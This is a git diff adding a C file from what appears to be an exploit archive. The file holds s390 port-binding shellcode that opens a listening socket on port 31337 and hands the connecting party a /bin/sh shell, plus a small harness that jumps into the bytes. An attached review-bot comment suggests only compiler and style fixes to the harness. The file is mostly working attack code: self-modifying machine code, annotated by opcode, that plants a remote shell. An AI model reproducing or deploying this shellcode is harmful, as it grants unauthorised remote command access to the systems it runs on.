X-Git-Url: https://git.librecmc.org/?p=oweals%2Fthc-archive.git;a=blobdiff_plain;f=Exploits%2F390portbind.c;fp=Exploits%2F390portbind.c;h=308343a58aa3390a05929d8738644802497c7375;hp=0000000000000000000000000000000000000000;hb=dfbf6f563fd603e051f44a00e375b592a002b736;hpb=1bf41562f218d9a607f88640fb33bf0775424756
diff --git a/Exploits/390portbind.c b/Exploits/390portbind.c
new file mode 100644
index 0000000..308343a
--- /dev/null
+++ b/Exploits/390portbind.c
@@ -0,0 +1,82 @@
+/*----------------------------------------------------------------------*/
+/* s390 portbinding shellcode - svc opcode 0x0a free */
+/* code by jcyberpunk@thehackerschoice.com */
+/*----------------------------------------------------------------------*/
+char shellcode[]=
+"\x0d\x10" /* basr %r1,%r0 */
+"\x41\x90\x10\xd4" /* la %r9,212(%r1) */
+"\xa7\x68\x04\x56" /* lhi %r6,1110 */
+"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
+"\x1a\x6a" /* ar %r6,%r10 */
+"\x42\x60\x10\xd4" /* stc %r6,212(%r1) */
+"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
+"\x1a\x2a" /* ar %r2,%r10 */
+"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
+"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
+"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
+"\x17\x44" /* xr %r4,%r4 */
+"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
+"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
+"\x1a\x3a" /* ar %r3,%r10 */
+"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
+"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
+"\x1a\x2a" /* ar %r2,%r10 */
+"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\x18\x72" /* lr %r7,%r2 */
+"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
+"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
+"\x1a\x8a" /* ar %r8,%r10 */
+"\x18\x48" /* lr %r4,%r8 */
+"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
+"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
+"\x1a\x2a" /* ar %r2,%r10 */
+"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\x18\x27" /* lr %r2,%r7 */
+"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
+"\x1a\x3a" /* ar %r3,%r10 */
+"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
+"\xa7\x28\x04\x50" /* lhi %r2,1104 */
+"\x1a\x2a" /* ar %r2,%r10 */
+"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\x18\x27" /* lr %r2,%r7 */
+"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
+"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
+"\x50\x80\xf0\x88" /* st %r8,136(%r15) */
+"\xa7\x28\x04\x51" /* lhi %r2,1105 */
+"\x1a\x2a" /* ar %r2,%r10 */
+"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
+"\x1a\x6a" /* ar %r6,%r10 */
+"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
+"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
+"\x1a\x3a" /* ar %r3,%r10 */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\xa7\x68\x04\x57" /* lhi %r6,1111 */
+"\x1a\x6a" /* ar %r6,%r10 */
+"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
+"\x41\x20\x10\xd8" /* la %r2,216(%r1) */
+"\x50\x20\x10\xe0" /* st %r2,224(%r1) */
+"\x41\x30\x10\xe0" /* la %r3,224(%r1) */
+"\x17\x44" /* xr %r4,%r4 */
+"\x42\x40\x10\xdf" /* stc %r4,223(%r1) */
+"\x50\x40\x10\xe4" /* st %r4,228(%r1) */
+"\x41\x40\x10\xe4" /* la %r4,228(%r1) */
+"\x0d\xe9" /* basr %r14,%r9 */
+"\x0b\x66" /* svc 102 <--- after modification */
+"\x07\xfe" /* br %r14 */
+"\x2f\x62\x69\x6e" /* /bin */
+"\x2f\x73\x68\x5c"; /* /sh\ */
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}
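Review bot: `main()` at the bottom of the hunk relies on an implicit `int` return type and then falls off the end without returning a value; implicit int was removed in C99 and current compilers reject it outright, so as written the test harness no longer builds. I would write `int main(void)` and close the body with `return 0;`. The `(void*)shellcode` initialiser is also a conversion from an object pointer to a function pointer, which the C standard does not define, so the harness is tied to the compiler and ABI it was written against; a comment such as `/* object-to-function pointer cast: compiler-specific, not portable C */` would make that explicit for readers of the archive.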